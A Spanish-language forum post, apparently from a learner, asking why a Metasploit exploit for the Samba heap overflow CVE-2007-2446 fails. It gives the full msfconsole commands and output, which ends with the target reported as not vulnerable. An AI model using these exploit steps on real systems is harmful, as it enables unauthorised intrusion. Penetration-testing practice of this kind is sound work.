CVE 2007-2446
La version de servidor samba de la maquina objetivo es vulnerable a un ataque de desbordamiento de buffer, y en el reporte me dice cual exploit usar con metasploits , entonces
tecleo:
#msfconsole
msf use exploit/linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > set RHOST X.X:X:.X
msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/exec
msf exploit(lsa_transnames_heap) > set CMD ifconfig
msf exploit(lsa_transnames_heap) > show options
Module options (exploit/linux/samba/lsa_transnames_heap):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.107 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE LSARPC yes The pipe name to use
Payload options (linux/x86/exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD ifconfig yes The command string to execute
Exploit target:
Id Name
-- ----
0 Linux vsyscall
msf exploit(lsa_transnames_heap) > exploit
- Creating nop sled....
- Trying to exploit Samba with address 0xffffe410...
- Connecting to the SMB service... [-] Exploit exception: This target is not a vulnerable Samba server (Samba 3.0.20-Debian)
?????Que hago mal??o es un positivo falso lo que me da nessus, porque hace mucho cuando andaba en mi epoca de aprender lo mas rapido posible corria el armitage desde BT y funcionaba solo!!! Jeje pero ahorita me muevo con debia alguna idea
Saludos!